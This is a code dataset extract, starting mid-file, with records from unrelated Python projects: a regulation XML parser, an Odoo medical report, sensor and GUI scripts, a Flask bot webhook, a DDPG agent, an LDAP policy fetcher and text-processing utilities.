(%s) not followed by something \"\n + \"disambiguating (%s)\", c, next_marker)\n return potential[0][0] + 1\n\n else:\n return potential[0] + 1\n\n\ndef get_reg_part(reg_doc):\n \"\"\"\n The CFR Part number for a regulation is contained within\n an EAR tag, for a Federal Register notice it's in a REGTEXT tag. Get the\n part number of the regulation.\n \"\"\"\n\n #FR notice\n reg_text_xml = reg_doc.xpath('//REGTEXT')\n if reg_text_xml:\n return reg_text_xml[0].attrib['PART']\n\n #e-CFR XML\n reg_ear = reg_doc.xpath('//PART/EAR')\n if reg_ear:\n return reg_ear[0].text.split('Pt.')[1].strip()\n\n\ndef get_title(reg_doc):\n \"\"\" Extract the title of the regulation. \"\"\"\n parent = reg_doc.xpath('//PART/HD')[0]\n title = parent.text\n return title\n\n\ndef preprocess_xml(xml):\n \"\"\"This transforms the read XML through macros. 
Each macro consists of\n    an xpath and a replacement xml string\"\"\"\n    for path, replacement in content.Macros():\n        replacement = etree.fromstring('<ROOT>' + replacement + '</ROOT>')\n        for node in xml.xpath(path):\n            parent = node.getparent()\n            idx = parent.index(node)\n            parent.remove(node)\n            for repl in replacement:\n                parent.insert(idx, repl)\n                idx += 1\n\n\ndef build_tree(reg_xml):\n    doc = etree.fromstring(reg_xml)\n    preprocess_xml(doc)\n\n    reg_part = get_reg_part(doc)\n    title = get_title(doc)\n\n    tree = Node(\"\", [], [reg_part], title)\n\n    part = doc.xpath('//PART')[0]\n\n    subpart_xmls = [c for c in part.getchildren() if c.tag == 'SUBPART']\n    if len(subpart_xmls) > 0:\n        subparts = [build_subpart(reg_part, s) for s in subpart_xmls]\n        tree.children = subparts\n    else:\n        section_xmls = [c for c in part.getchildren() if c.tag == 'SECTION']\n        sections = []\n        for section_xml in section_xmls:\n            sections.extend(build_from_section(reg_part, section_xml))\n        empty_part = reg_text.build_empty_part(reg_part)\n        empty_part.children = sections\n        tree.children = [empty_part]\n\n    non_reg_sections = build_non_reg_text(doc, reg_part)\n    tree.children += non_reg_sections\n\n    return tree\n\n\ndef get_subpart_title(subpart_xml):\n    hds = subpart_xml.xpath('./HD')\n    return [hd.text for hd in hds][0]\n\n\ndef build_subpart(reg_part, subpart_xml):\n    subpart_title = get_subpart_title(subpart_xml)\n    subpart = reg_text.build_subpart(subpart_title, reg_part)\n\n    sections = []\n    for ch in subpart_xml.getchildren():\n        if ch.tag == 'SECTION':\n            sections.extend(build_from_section(reg_part, ch))\n\n    subpart.children = sections\n    return subpart\n\n\ndef get_markers(text):\n    \"\"\" Extract all the paragraph markers from text. Do some checks on the\n    collapsed markers.\"\"\"\n    markers = tree_utils.get_paragraph_markers(text)\n    collapsed_markers = tree_utils.get_collapsed_markers(text)\n\n    # Check that the collapsed markers make sense (i.e. are at least one\n    # level below the initial marker)\n    if markers and collapsed_markers:\n        initial_marker_levels = p_level_of(markers[-1])\n        final_collapsed_markers = []\n        for collapsed_marker in collapsed_markers:\n            collapsed_marker_levels = p_level_of(collapsed_marker)\n            if any(c > f for f in initial_marker_levels\n                   for c in collapsed_marker_levels):\n                final_collapsed_markers.append(collapsed_marker)\n        collapsed_markers = final_collapsed_markers\n    markers_list = [m for m in markers] + [m for m in collapsed_markers]\n\n    return markers_list\n\n\ndef get_markers_and_text(node, markers_list):\n    node_text = tree_utils.get_node_text(node, add_spaces=True)\n    text_with_tags = tree_utils.get_node_text_tags_preserved(node)\n\n    if len(markers_list) > 1:\n        actual_markers = ['(%s)' % m for m in markers_list]\n        plain_markers = [m.replace('<E T=\"03\">', '').replace('</E>', '')\n                         for m in actual_markers]\n        node_texts = tree_utils.split_text(node_text, plain_markers)\n        tagged_texts = tree_utils.split_text(text_with_tags, actual_markers)\n        node_text_list = zip(node_texts, tagged_texts)\n    elif markers_list:\n        node_text_list = [(node_text, text_with_tags)]\n    return zip(markers_list, node_text_list)\n\n\ndef next_marker(xml_node, remaining_markers):\n    \"\"\"Try to determine the marker following the current xml_node. Remaining\n    markers is a list of other marks *within* the xml_node. 
May return\n    None\"\"\"\n    # More markers in this xml node\n    if remaining_markers:\n        return remaining_markers[0][0]\n\n    # Check the next xml node; skip over stars\n    sib = xml_node.getnext()\n    while sib is not None and sib.tag in ('STARS', 'PRTPAGE'):\n        sib = sib.getnext()\n    if sib is not None:\n        next_text = tree_utils.get_node_text(sib)\n        next_markers = get_markers(next_text)\n        if next_markers:\n            return next_markers[0]\n\n\ndef build_from_section(reg_part, section_xml):\n    p_level = 1\n    m_stack = tree_utils.NodeStack()\n    section_texts = []\n    for ch in (ch for ch in section_xml.getchildren() if ch.tag == 'P'):\n        text = tree_utils.get_node_text(ch, add_spaces=True)\n        tagged_text = tree_utils.get_node_text_tags_preserved(ch)\n        markers_list = get_markers(tagged_text)\n\n        if not markers_list:\n            section_texts.append((text, tagged_text))\n        else:\n            markers_and_text = get_markers_and_text(ch, markers_list)\n\n            # Easier to reason if we view the list as a stack\n            markers_and_text = list(reversed(markers_and_text))\n            while markers_and_text:\n                m, node_text = markers_and_text.pop()\n                m_sans_markup = m.replace('<E T=\"03\">', '').replace('</E>', '')\n                n = Node(node_text[0], [], [str(m_sans_markup)],\n                         source_xml=ch)\n                n.tagged_text = unicode(node_text[1])\n\n                new_p_level = determine_level(\n                    m, p_level, next_marker(ch, markers_and_text))\n\n                last = m_stack.peek()\n                if len(last) == 0:\n                    m_stack.push_last((new_p_level, n))\n                else:\n                    m_stack.add(new_p_level, n)\n                p_level = new_p_level\n\n    section_no = section_xml.xpath('SECTNO')[0].text\n    subject_xml = section_xml.xpath('SUBJECT')\n    if not subject_xml:\n        subject_xml = section_xml.xpath('RESERVED')\n    subject_text = subject_xml[0].text\n\n    nodes = []\n    section_nums = []\n    for match in re.finditer(r'%s\\.(\\d+)' % reg_part, section_no):\n        section_nums.append(int(match.group(1)))\n\n    # Span of section numbers\n    if u'§§' == section_no[:2] and '-' in section_no:\n        first, last = section_nums\n        section_nums = []\n        for i in range(first, last + 1):\n            section_nums.append(i)\n\n    for section_number in section_nums:\n        section_number = str(section_number)\n        plain_sect_texts = [s[0] for s in section_texts]\n        tagged_sect_texts = [s[1] for s in section_texts]\n\n        section_text = ' '.join([section_xml.text] + plain_sect_texts)\n        tagged_section_text = ' '.join([section_xml.text] + tagged_sect_texts)\n        section_title = u\"§ \" + reg_part + \".\" + section_number\n        if subject_text:\n            section_title += \" \" + subject_text\n\n        sect_node = Node(\n            section_text, label=[reg_part, section_number],\n            title=section_title)\n        sect_node.tagged_text = tagged_section_text\n\n        m_stack.add_to_bottom((1, sect_node))\n\n        while m_stack.size() > 1:\n            m_stack.unwind()\n\n        nodes.append(m_stack.pop()[0][1])\n\n    return nodes\n","sub_path":"regparser/tree/xml_parser/reg_text.py","file_name":"reg_text.py","file_ext":"py","file_size_in_byte":9371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"254134765","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\n\n\nclass PatientEvaluation(models.AbstractModel):\n    _name = 'report.medical_history.patient_evaluation'\n\n    def get_marital_status(self, ids):\n        this = self.env[\"medical.patient\"].search([('id', '=', ids)])\n        for record in this:\n            if record.marital_status == 's':\n                aux = 'Single'\n            elif record.marital_status == 'm':\n                aux = 'Married'\n            elif record.marital_status == 'w':\n                aux = 'Widow(er)'\n            elif record.marital_status == 'd':\n                aux = 'Divorced'\n            else:\n                aux = 'Separated'\n        return aux\n\n    
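# Glasgow Coma Scale helpers: translate the stored codes to report labels\n    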
def get_loc_eyes(self, ids):\n this = self.env[\"medical.patient.evaluation\"].search([('id', '=', ids)])\n for record in this:\n if record.loc_eyes == '1':\n aux = 'Does not Open Eyes'\n elif record.loc_eyes == '2':\n aux = 'Opens eyes in response to painful stimuli'\n elif record.loc_eyes == '3':\n aux = 'Opens eyes in response to voice'\n else:\n aux = 'Opens eyes spontaneously'\n return aux\n\n def get_loc_verbal(self, ids):\n this = self.env[\"medical.patient.evaluation\"].search([('id', '=', ids)])\n for record in this:\n if record.loc_verbal == '1':\n aux = 'Makes no sounds'\n elif record.loc_verbal == '2':\n aux = 'Incomprehensible sounds'\n elif record.loc_verbal == '3':\n aux = 'Utters inappropriate words'\n elif record.loc_verbal == '4':\n aux = 'Confused, disoriented'\n else:\n aux = 'Oriented, converses normally'\n return aux\n\n def get_loc_motor(self, ids):\n this = self.env[\"medical.patient.evaluation\"].search([('id', '=', ids)])\n for record in this:\n if record.loc_motor == '1':\n aux = 'Makes no movement'\n elif record.loc_motor == '2':\n aux = 'Extension to painful stimuli - decerebrate response -'\n elif record.loc_motor == '3':\n aux = 'Abnormal flexion to painful stimuli (decorticate response)'\n elif record.loc_motor == '4':\n aux = 'Flexion / Withdrawal to painful stimuli'\n elif record.loc_motor == '5':\n aux = 'Localizes painful stimuli'\n else:\n aux = 'Obeys commands'\n return aux\n\n def get_discharge_reason(self, ids):\n this = self.env[\"medical.patient.evaluation\"].search([('id', '=', ids)])\n for record in this:\n if record.discharge_reason == 'home':\n aux = 'Home / Selfcare'\n elif record.discharge_reason == 'transfer':\n aux = 'Transferred to another institution'\n else:\n aux = 'Death'\n return aux\n\n def get_xory(self, ids):\n this = self.env[\"medical.patient.family.diseases\"].search([('patient', '=', ids)])\n for record in this:\n if record.xory == 'm':\n aux = 'Maternal'\n elif record.xory == 'f':\n aux = 'Paternal'\n elif record.xory == 's':\n aux = 'Sibling'\n else:\n aux = ''\n return aux\n\n def get_relative(self, ids):\n this = self.env[\"medical.patient.family.diseases\"].search([('patient', '=', ids)])\n for record in this:\n if record.relative == 'mother':\n aux = 'Mother'\n elif record.relative == 'father':\n aux = 'Father'\n elif record.relative == 'brother':\n aux = 'Brother'\n elif record.relative == 'sister':\n aux = 'Sister'\n elif record.relative == 'aunt':\n aux = 'Aunt'\n elif record.relative == 'uncle':\n aux = 'Uncle'\n elif record.relative == 'nephew':\n aux = 'Nephew'\n elif record.relative == 'niece':\n aux = 'Niece'\n elif record.relative == 'grandfather':\n aux = 'Grandfather'\n elif record.relative == 'grandmother':\n aux = 'Grandmother'\n else:\n aux = 'Cousin'\n return aux\n\n def get_sexual_preferences(self, ids):\n this = self.env[\"medical.patient\"].search([('id', '=', ids)])\n for record in this:\n if record.sexual_preferences == 'h':\n aux = 'Heterosexual'\n elif record.sexual_preferences == 'g':\n aux = 'Homosexual'\n elif record.sexual_preferences == 'b':\n aux = 'Bisexual'\n else:\n aux = 'Transexual'\n return aux\n\n @api.model\n def _get_report_values(self, docids, data=None):\n patient = self.env['medical.patient.evaluation'].browse(docids)\n return {\n 'doc_ids': docids,\n 'doc_model': 'medical.patient.evaluation',\n 'docs': patient,\n 'data': data,\n 'marital_status': self.get_marital_status,\n 'loc_eyes': self.get_loc_eyes,\n 'loc_verbal': self.get_loc_verbal,\n 'loc_motor': self.get_loc_motor,\n 
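# the remaining selection fields are rendered through their helpers\n            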
'discharge_reason': self.get_discharge_reason,\n 'xory': self.get_xory,\n 'relative': self.get_relative,\n 'sexual_preferences': self.get_sexual_preferences,\n\n }\n","sub_path":"medical_history/reports/patient_evaluation_report.py","file_name":"patient_evaluation_report.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"14242556","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport sys\nimport dhtreader\n\nDHT11 = 11\nDHT22 = 22\nAM2302 = 22\n\n\ndhtreader.init()\n\nt, h = dhtreader.read(22, 4)\nif t and h:\n print(\"Temp = {0} *C, Hum = {1} %\".format(t, h))\nelse:\n print(\"Failed to read from sensor, maybe try again?\")\n","sub_path":"Adafruit_DHT_Driver_Python/build/lib.linux-armv6l-2.7/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"499651116","text":"import subprocess\nfrom copy import deepcopy\n\ndef self_play(player1,player2):\n # run the program with the two players \n stdoutdata = subprocess.check_output(['python','referee.py',player1,player2])\n \n # return the processed data as a tuple containing a list of dictionaries and the result\n return process_game(stdoutdata.decode(\"utf-8\"))\n \ndef process_game(game):\n '''\n Returns the result of a game as a list of dictionaries\n and the result\n '''\n \n lines = game.splitlines()\n \n current_board_line = 0\n game_over = False\n \n states = []\n state = []\n \n for i in range(4,len(lines)): \n \n if \"game over!\" in lines[i]:\n game_over = True\n continue\n \n if game_over:\n winner = lines[i][8]\n break\n \n if current_board_line == 8:\n current_board_line = 0\n states.append(state)\n state = deepcopy(state)\n state = []\n continue\n \n state.append(lines[i].split())\n current_board_line += 1\n \n dict_states = []\n for state in states:\n state_dict = {(x,y):state[y][x] for x in range(8) for y in range(8)}\n dict_states.append(state_dict)\n return dict_states, winner\n \n ","sub_path":"selfplay.py","file_name":"selfplay.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"319000022","text":"from . 
update_inventory_item_field import UpdateInventoryItemField\n\n\nclass UpdateBarcode(UpdateInventoryItemField):\n    field_name = 'Barcode'\n\n    def __init__(self, api_session, value=None, stock_id=None):\n        if value is not None:\n            self.value = value\n        if stock_id is not None:\n            self.stock_id = stock_id\n        super().__init__(api_session)\n\n    def test_request(self):\n        assert isinstance(self.value, str), \"Value must be of type str\"\n        return super().test_request()\n","sub_path":"pylinnworks/api_requests/inventory/update_inventory/update_barcode.py","file_name":"update_barcode.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"51695826","text":"from Tkinter import *\ndef main():\n\timport sys\n\tlength=3\n\n\t#switch_details={'interface_name':[\"\"]*length,\n\t# \t\t\t'avail_out_interfaces':[0]*length,\n\t# \t\t\t'subnet_IP_addr':[0]*length,\n\t# \t\t\t'delay':[0]*length}\n\n\tswitch_details={'interface_name':[\"Int#1\",\"Int#2\",\"Int#3\"],\n \t\t\t\t'avail_out_interfaces':[5,2,10],\n \t\t\t\t'subnet_IP_addr':[\"172.16.68\",\"172.16.68\",\"172.16.68\"],\n \t\t\t\t'delay':[50,25,75]}\n\n\n\t#for i in range(3):\n\t#\tswitch_details['interface_name'][i]=raw_input(\"Enter interface name : \")\n\t#\tswitch_details['avail_out_interfaces'][i]=input(\"Enter available no. of output interfaces : \")\n\t#\tswitch_details['subnet_IP_addr'][i]=raw_input(\"Enter subnet IP : \")\n\t#\tswitch_details['delay'][i]=input(\"Enter Delay per interface : \")\n\n\n\t#for i in range(3):\n\t#\tprint \\\n\t#\tswitch_details['interface_name'][i],\" | \",\\\n\t#\tswitch_details['avail_out_interfaces'][i],\" | \",\\\n\t#\tswitch_details['subnet_IP_addr'][i],\" | \",\\\n\t#\tswitch_details['delay'][i]\n\n\t# sys.stdout.softspace=0 #To stop python from inserting spaces between two things in one print statement\n\t#from __future__ import print_function\n\t#print('h',end='') # To stop python from inserting newline character at the end of line\n\t#print('h','m','h',sep='') #To stop python from inserting spaces between two things in one print statement\n\n\t#for i in range(3):\n\t#\tsys.stdout.write(switch_details['subnet_IP_addr'][i]+\".\"+str(i)+\"\\n\")\n\t\t# sys.stdout.write can only print string. 
So, we have to convert i to string by str(i)\n\n\tinput_interface_name = str(interface_name.get())\n\tinput_output_interfaces = int(in_out_interfaces.get())\n\n\tfob = open('fri_3_5_even.txt','w')\n\n\tfor i in range(3):\n\t\tif(switch_details['interface_name'][i] == input_interface_name):\n\t\t\tif(input_output_interfaces<=switch_details['avail_out_interfaces'][i]):\n\t\t\t\tif(((switch_details['delay'][i])*(input_output_interfaces))<=300):\n\t\t\t\t\tfob.write(\"Interface Name : \"+input_interface_name+\"\\n\")\n\t\t\t\t\tfob.write(\"Number of requested output interfaces : \"+str(input_output_interfaces)+\"\\n\")\n\t\t\t\t\tfob.write(\"Estimated Delay : \"+str((switch_details['delay'][i])*(input_output_interfaces))+\"\\n\")\n\t\t\t\t\tfob.write(\"Assigned IP Address : \"+\"\\n\")\n\t\t\t\t\tfor j in range(input_output_interfaces):\n\t\t\t\t\t\tfob.write(switch_details['subnet_IP_addr'][i]+\".\"+str(j+1)+\"\\n\")\n\t\t\t\telse:\n\t\t\t\t\tfob.write(\"Error\")\n\tfob.close()\n\tfob = open('fri_3_5_even.txt','r')\n\ttextField.delete(0.0,END)\n\ttextField.insert(INSERT,fob.read())\n\tfob.close()\n\n\nif __name__ == '__main__' :\n\troot = Tk()\n\tLabel(root,text=\"Interface Name :\").grid(row=0)\n\tLabel(root,text = \"No of output Interfaces :\").grid(row=1)\n\n\tinterface_name = StringVar()\n\tentry_interface = Entry(root, textvariable = interface_name)\n\tentry_interface.grid(row=0, column=1)\n\n\tin_out_interfaces = StringVar()\n\tentry_no_interface = Entry(root, textvariable = in_out_interfaces)\n\tentry_no_interface.grid(row=1, column=1)\n\tok_button = Button(root,text=\"OK\", command=lambda :main())\n\tok_button.grid(row=4,column=0,rowspan=2,columnspan=2)\n\n\ttextField = Text(root)\n\ttextField.grid(row =6,columnspan=4)\n\troot.mainloop()\n\t\n","sub_path":"fri_3_5_even_odd_combined.py","file_name":"fri_3_5_even_odd_combined.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"296534090","text":"#client\nimport socket,sys,threading\nfrom select import select\nfrom setting import *\nimport random\n\n\ndef connect(s_cli,p_serv):\n rlst = [s_cli,p_serv]\n wlst = []\n \n while True:\n rd, wd, ex = select(rlst, wlst, rlst)\n for r in rd:\n if r is s_cli:\n try:\n data = r.recv(1024)\n print(data.decode('utf-8'))\n except Exception:\n continue\n \n else:\n conn, addr = r.accept()\n data = conn.recv(1024)\n s_cli.send(data)\n conn.close()\n\nif __name__ == \"__main__\":\n name=input(\"input your nickname: \")\n s_cli = sock_cli(SOCK_SERV)\n s_cli.send(bytes('{} connection...'.format(name),'utf-8'))\n \n while True:\n PORT = random.randint(5000, 10000)\n if PORT not in PORTS:break\n P_ADDR=('127.0.0.1',PORT)\n p_serv = sock_serv(P_ADDR)\n\n t = threading.Thread(target=connect, args=(s_cli,p_serv))\n t.setDaemon(True)\n t.start()\n\n while True:\n try:\n \n data =input()\n \n except KeyboardInterrupt:\n s_cli.close()\n p_serv.close()\n break\n if not data:\n break\n else:\n p_cli = sock_cli(P_ADDR)\n p_cli.send(bytes(name+' : '+data, 'utf-8'))\n p_cli.close()","sub_path":"chat/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"92126038","text":"import flask\nimport vk_io.settings\nimport system.main_handler\nimport git\nimport telegram_io.telegram_api\n\nsecret = \"\"\napp = 
flask.Flask(__name__)\ntelegram_io.telegram_api.set_webhook(secret)\n\n\n@app.route('/{}'.format(secret), methods=['POST'])\ndef processing():\n data = flask.json.loads(flask.request.data)\n system.main_handler.load_api(check_source(data), data)\n if 'type' in data.keys() and data['type'] == 'confirmation':\n return vk_io.settings.confirmation_token\n else:\n system.main_handler.build(data)\n return 'ok'\n\n\n@app.route('/{}_webhook'.format(secret), methods=['POST'])\ndef webhook():\n repo = git.Repo('/home/milty/POEbot')\n origin = repo.remotes.origin\n repo.create_head('master', origin.refs.master).set_tracking_branch(origin.refs.master).checkout()\n origin.pull()\n return '', 200\n\n\ndef check_source(message):\n if 'object' in message.keys():\n return 1\n elif 'message' in message.keys():\n return 2\n else:\n return 0\n","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125605523","text":"from model import Actor, Critic\nfrom ragdoll import ragdoll\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.optim as optim\nfrom replayBuffer import ReplayBuffer\nfrom OUNoise import OUNoise\n\ndevice = torch.device(\"cuda:0\")\n# device = torch.device(\"cpu\")\n\n\nLR_ACTOR = 0.0001# 0.0001\nLR_CRITIC = 0.001 #0.001\nWEIGHT_DECAY = 0.001\nBUFFER_SIZE = 100000 #1000000\nBATCH_SIZE = 20 # was 10, tried 100 -> very slow on cpu\ndiscount_factor = 0.99\nTAU = 0.001\n\nclass Agent():\n\n\tdef __init__(self, state_size, action_size):\n\n\t\tself.state_size = state_size\n\t\tself.action_size = action_size\n\n\t\t#init actor\n\t\tself.actor = Actor(state_size,action_size).to(device)\n\t\tself.actor_target = Actor(state_size,action_size).to(device)\n\t\tself.actor_optimizer = optim.Adam(self.actor.parameters(), lr = LR_ACTOR)\n\t\t#init critic\n\t\tself.critic = Critic(state_size,action_size).to(device)\n\t\tself.critic_target = Critic(state_size,action_size).to(device)\n\t\tself.critic_optimizer = optim.Adam(self.critic.parameters(), lr = LR_CRITIC, weight_decay = WEIGHT_DECAY)\n\n\t\tself.memory = ReplayBuffer(action_size, BUFFER_SIZE, BATCH_SIZE)\n\n\t\tself.noise = OUNoise(action_size)\n\n\t\tself.aLossOut = 0\n\t\tself.cLossOut = 0\n\n\tdef step(self, state, action,reward,next_state,done, is_learning = True):\n\t\t\"\"\"save experience to memory buffer\"\"\"\n\t\tself.memory.add(state,action,reward,next_state,done)\n\n\t\t#sample (returns numpy array)\n\t\tif len(self.memory) > BATCH_SIZE and is_learning == True:\n\t\t\texperiences = self.memory.sample()\n\t\t\tself.learn(experiences, discount_factor)\n\n\tdef learn(self, experiences, discount_factor):\n\t\tstates, actions, rewards, next_states, dones = experiences\n\n\t\t#update critic\n\t\tQvals = self.critic.forward(states,actions)\n\t\tnext_actions = self.actor_target.forward(next_states)\n\t\tnext_Q = self.critic_target.forward(next_states, next_actions)\n\t\tQprime = rewards + discount_factor*next_Q*(1-dones) #ignores result of samples that are at the end\n\n\t\tcloss = nn.SmoothL1Loss()\n\t\t# closs = nn.MSELoss() - error too large, this explodes\n\t\tcritic_loss = closs(Qvals,Qprime)\n\t\tself.cLossOut = critic_loss.cpu().detach().numpy()\n\t\tself.critic_optimizer.zero_grad()\n\t\tcritic_loss.backward()\n\t\tself.critic_optimizer.step()\n\n\t\t# Compute actor loss\n\t\tactions_pred = self.actor(states)\n\t\tactor_loss = 
-self.critic(states, actions_pred).mean()\n\t\tself.aLossOut = actor_loss.cpu().detach().numpy()\n\n\t\t# Minimize the loss\n\t\tself.actor_optimizer.zero_grad()\n\t\tactor_loss.backward()\n\t\tself.actor_optimizer.step()\n\n\t\tself.soft_update(self.critic, self.critic_target, TAU)\n\t\tself.soft_update(self.actor, self.actor_target, TAU) \n\n\tdef soft_update(self, local_model, target_model, tau):\n\t\t\"\"\"θ_target = τ*θ_local + (1 - τ)*θ_target\"\"\"\n\t\tfor target_param, local_param in zip(target_model.parameters(), local_model.parameters()):\n\t\t\ttarget_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)\n","sub_path":"HW3/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"216061145","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n    Ajan utils.\n\"\"\"\n\nimport hashlib\nimport ldap\nimport ldif\nimport logging\nimport os\nimport time\nimport StringIO\n\n\ndef get_ldif(value):\n    \"\"\"\n    Converts a policy object to LDIF string.\n\n    Args:\n        value: Policy setting object\n    Returns: LDIF string\n    \"\"\"\n    output = StringIO.StringIO()\n    writer = ldif.LDIFWriter(output)\n    try:\n        writer.unparse(value[0], value[1])\n        text = output.getvalue()\n    except (KeyError, TypeError):\n        return ''\n    output.close()\n    return text\n\ndef load_ldif(filename):\n    \"\"\"\n    Reads an LDIF file and returns as a policy object.\n\n    Args:\n        filename: File that contains LDIF\n    Returns:\n        Policy object\n    \"\"\"\n    class MyLDIF(ldif.LDIFParser):\n        \"\"\"Custom LDIF Parser\"\"\"\n        def handle(self, dn, entry):\n            \"\"\"LDIF Handler\"\"\"\n            if self.comp:\n                self.ou.append(entry)\n            else:\n                self.comp = entry\n\n    try:\n        parser = MyLDIF(file(filename))\n    except (KeyError, TypeError):\n        return None\n    parser.comp = None\n    parser.ou = []\n    parser.parse()\n    return parser.comp\n\ndef fetch_policy(conn, options, domain, pattern):\n    \"\"\"\n    Fetches a policy if necessary.\n\n    Args:\n        conn: LDAP connection object\n        options: Options\n        domain: Domain name\n        pattern: Search pattern\n    Returns:\n        True or False\n    \"\"\"\n    policy_file = os.path.join(options.policydir, \"policy_\" + options.username)\n    timestamp_file = policy_file + '.ts'\n    timestamp_old = ''\n    timestamp_new = ''\n    update_required = False\n\n    if os.path.exists(timestamp_file):\n        timestamp_old = file(timestamp_file).read().strip()\n\n    if not timestamp_old:\n        update_required = True\n\n    search = conn.search_s(domain, ldap.SCOPE_SUBTREE, pattern, ['modifyTimestamp'])\n    if len(search):\n        attrs = search[0][1]\n        timestamp_new = attrs['modifyTimestamp'][0]\n        if timestamp_new != timestamp_old:\n            update_required = True\n\n    if update_required:\n        search = conn.search_s(domain, ldap.SCOPE_SUBTREE, pattern)\n        if len(search):\n            attrs = search[0][1]\n            file(timestamp_file, 'w').write(timestamp_new)\n            file(policy_file, 'w').write(get_ldif(attrs))\n            return True, attrs\n\n    return False, {}\n\ndef ldap_go(options, q_in, q_out):\n    \"\"\"\n    Main event loop for LDAP worker\n    \"\"\"\n    # Load last fetched policy\n    logging.info(\"Loading last fetched policy.\")\n    filename = os.path.join(options.policydir, \"policy_\" + options.username)\n    if os.path.exists(filename):\n        policy = load_ldif(filename)\n        if policy:\n            q_in.put({\"type\": \"policy init\", \"policy\": policy})\n\n    domain = \"dc=\" + options.domain.replace(\".\", \", dc=\")\n    username = \"cn=%s, %s\" % (options.username, domain)\n    while True:\n        try:\n            conn = ldap.open(options.hostname)\n            conn.simple_bind(username, 
options.password)\n while True:\n pattern = \"(cn=%s)\" % options.username\n updated, policy = fetch_policy(conn, options, domain, pattern)\n if updated:\n logging.info(\"LDAP policy was updated.\")\n policy_repr = dict(zip(policy.keys(), ['...' for x in range(len(policy))]))\n logging.debug(\"New policy: %s\" % policy_repr)\n q_in.put({\"type\": \"policy\", \"policy\": policy})\n time.sleep(options.interval)\n except (ldap.SERVER_DOWN, ldap.NO_SUCH_OBJECT, IndexError):\n logging.warning(\"LDAP connection failed. Retrying in 3 seconds.\")\n time.sleep(3)\n","sub_path":"playground/beyza.ermis/ahenk/ajan/ahenk/agent/bck_ldap.py","file_name":"bck_ldap.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"202808387","text":"import os\nimport string\nfrom queue import Queue\nimport re\n\nfrom sentence import Sentence\nfrom sentences_collection import SentencesCollection\n\n\nclass Initialization:\n def __init__(self, path):\n self.path=path\n self.sentences_collection=SentencesCollection()\n\n #Open the main directory, read it's sub files and directories and send the files for treatment.\n def initialize(self):\n print(\"Loading the files and preparing the system...\")\n directories=Queue()\n directories.put(self.path)\n x=''\n try:\n directory_path=''\n while not directories.empty():\n directory_path=directories.get()+'/'\n # print(\"directory path: \",directory_path)\n for x in os.listdir(directory_path):\n path=directory_path+x\n if os.path.isdir(path):\n directories.put(path)\n elif x.endswith(\".txt\"):\n self.file_handler(path)\n else:\n raise IsADirectoryError\n print(\"The system is ready.\")\n except IsADirectoryError:\n print(f'Unknown file {x}')\n\n#Read a file and send each sentence to be insert to a trie.\n def file_handler(self, file_path):\n try:\n with open(file_path, encoding=\"utf8\") as file:\n line_number=1\n i=0\n for line in file:\n i+=1\n if line!=\"\":\n line = ''.join(x for x in line if x.isalpha() or x.isspace())\n line = ' '.join(line.split())\n location=file_path+str(line_number)\n sentence=Sentence(line.rstrip(),location,i)\n self.sentences_collection.add_sentence_obj(sentence)\n except Exception as e:\n print(e)\n","sub_path":"initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"419872719","text":"import pycor.resolver as resolver\nimport pycor.utils as utils\nimport pycor.speechmodel as sm\n\n\n__all__ = [\"CollocationResolver\"]\n\nclass CollocationContext(sm.ContextWrapper):\n def __init__(self, parent):\n super().__init__(parent)\n self.collocations = {}\n\n def getcollocation(self, text):\n col = self.collocations.get(text)\n if col is None:\n col = self.parent.getcollocation(text)\n return col\n \n def addcollocation(self, collocation):\n if self.collocations.get(collocation.text) is None:\n self.collocations[collocation.text] = collocation\n\n def clear(self):\n self.collocations.clear()\n\nclass CollocationResolver(resolver.Resolver):\n def resolveDocument(self, sentence_array, context):\n cascadingContext = CollocationContext(context)\n\n for sentence in sentence_array:\n self.resolveSentence(sentence, cascadingContext)\n \n for colloc in cascadingContext.collocations.values():\n if colloc.frequency > 1:\n # print(colloc, colloc.frequency)\n context.addcollocation(colloc)\n \n def resolveSentence(self,sentence, 
